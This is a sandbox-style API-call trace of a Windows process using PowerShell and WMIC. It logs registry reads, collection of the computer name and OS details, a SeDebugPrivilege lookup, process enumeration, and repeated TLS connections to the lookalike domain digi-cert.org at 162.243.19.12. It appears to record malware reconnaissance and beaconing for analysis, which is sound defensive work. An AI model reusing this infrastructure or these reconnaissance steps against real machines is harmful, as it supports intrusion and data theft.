Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\Nd9E1FYi	1	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	type = file_type	2	Fn
File	Read	size = 4096, size_out = 4096	2	Fn Data
File	Read	size = 4096, size_out = 972	1	Fn Data
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	50	Fn Data
File	Read	size = 4096, size_out = 1480	1	Fn Data
File	Read	size = 568, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Read	size = 4096, size_out = 978	1	Fn Data
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	4	Fn Data
File	Read	size = 4096, size_out = 214	1	Fn Data
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	2	Fn Data
File	Read	size = 4096, size_out = 537	1	Fn Data
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	30	Fn Data
File	Read	size = 4096, size_out = 3055	1	Fn Data
File	Read	size = 17, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	60	Fn Data
File	Read	size = 4096, size_out = 452	1	Fn Data
File	Read	size = 4096, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 4096	46	Fn Data
File	Read	size = 4096, size_out = 1668	1	Fn Data
File	Read	size = 380, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	8	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn

Thread 0x888

Category	Operation	Information	Count	Logfile
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	2	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x480

Category	Operation	Information	Success	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace		12	Fn

Thread 0x454

385

570

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	9	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\System32\Wbem\WMIC.config, type = file_attributes	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
File	Open Mapping	filename = Global\netfxcustomperfcounters.1.0.net clr networking, desired_access = FILE_MAP_WRITE	1	Fn
Module	Map	Global\netfxcustomperfcounters.1.0.net clr networking, process_name = c:\windows\system32\wbem\wmic.exe, desired_access = FILE_MAP_WRITE	1	Fn
System	Get Info	type = Operating System	2	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Process	Open	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Process	Open	desired_access = SYNCHRONIZE	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727, value_name = SchUseStrongCrypto, type = REG_NONE	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 125, size_out = 125	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 61, size_out = 61	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1575, size_out = 1575	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 331, size_out = 331	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4, size_out = 4	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 134, size_out = 134	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 218, size_out = 218	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 336, size_out = 336	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5504, size_out = 5504	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	3	Fn
System	Get Info	type = Operating System	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 501, size_out = 501	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 528, size_out = 528	1	Fn Data
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Module	Load	module_name = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll, base_address = 0x7ffbf68f0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = ResetSecurity, address_out = 0x7ffbf68f20e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SetSecurity, address_out = 0x7ffbf68f21b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = BlessIWbemServices, address_out = 0x7ffbf68f2290	1	Fn
Module	Get Address	module_name = Unknown module name, function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyHandle, address_out = 0x7ffbf68f24d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = WritePropertyValue, address_out = 0x7ffbf68f2500	1	Fn
Module	Get Address	module_name = Unknown module name, function = Clone, address_out = 0x7ffbf68f2530	1	Fn
Module	Get Address	module_name = Unknown module name, function = VerifyClientKey, address_out = 0x7ffbf68f31f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetQualifierSet, address_out = 0x7ffbf68f2a50	1	Fn
Module	Get Address	module_name = Unknown module name, function = Get, address_out = 0x7ffbf68f2700	1	Fn
Module	Get Address	module_name = Unknown module name, function = Put, address_out = 0x7ffbf68f26c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = Delete, address_out = 0x7ffbf68f2750	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetNames, address_out = 0x7ffbf68f2760	1	Fn
Module	Get Address	module_name = Unknown module name, function = BeginEnumeration, address_out = 0x7ffbf68f27b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = Next, address_out = 0x7ffbf68f27c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = EndEnumeration, address_out = 0x7ffbf68f2810	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820	1	Fn
Module	Get Address	module_name = Unknown module name, function = Clone, address_out = 0x7ffbf68f2530	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetObjectText, address_out = 0x7ffbf68f2840	1	Fn
Module	Get Address	module_name = Unknown module name, function = SpawnDerivedClass, address_out = 0x7ffbf68f2860	1	Fn
Module	Get Address	module_name = Unknown module name, function = SpawnInstance, address_out = 0x7ffbf68f2880	1	Fn
Module	Get Address	module_name = Unknown module name, function = CompareTo, address_out = 0x7ffbf68f28a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = InheritsFrom, address_out = 0x7ffbf68f28e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethod, address_out = 0x7ffbf68f28f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutMethod, address_out = 0x7ffbf68f2940	1	Fn
Module	Get Address	module_name = Unknown module name, function = DeleteMethod, address_out = 0x7ffbf68f2990	1	Fn
Module	Get Address	module_name = Unknown module name, function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = NextMethod, address_out = 0x7ffbf68f29b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMethodOrigin, address_out = 0x7ffbf68f2a30	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Get, address_out = 0x7ffbf68f2a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Delete, address_out = 0x7ffbf68f2ae0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_GetNames, address_out = 0x7ffbf68f2af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_BeginEnumeration, address_out = 0x7ffbf68f2b10	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_Next, address_out = 0x7ffbf68f2b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = QualifierSet_EndEnumeration, address_out = 0x7ffbf68f2b70	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetCurrentApartmentType, address_out = 0x7ffbf68f2a50	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetDemultiplexedStub, address_out = 0x7ffbf68f2060	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateInstanceEnumWmi, address_out = 0x7ffbf68f1760	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateClassEnumWmi, address_out = 0x7ffbf68f18c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = ExecQueryWmi, address_out = 0x7ffbf68f1a20	1	Fn
Module	Get Address	module_name = Unknown module name, function = ExecNotificationQueryWmi, address_out = 0x7ffbf68f1b90	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutInstanceWmi, address_out = 0x7ffbf68f1d00	1	Fn
Module	Get Address	module_name = Unknown module name, function = PutClassWmi, address_out = 0x7ffbf68f1e00	1	Fn
Module	Get Address	module_name = Unknown module name, function = CloneEnumWbemClassObject, address_out = 0x7ffbf68f1f00	1	Fn
Module	Get Address	module_name = Unknown module name, function = ConnectServerWmi, address_out = 0x7ffbf68f34c0	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	2	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 245, size_out = 245	1	Fn Data
Socket	Send	flags = NO_FLAG_SET, size = 229, size_out = 229	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 272, size_out = 272	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 8224	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 8224	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 8224	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 8224, size_out = 8224	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5584, size_out = 5584	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	6	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 272, size_out = 272	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1248, size_out = 1248	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
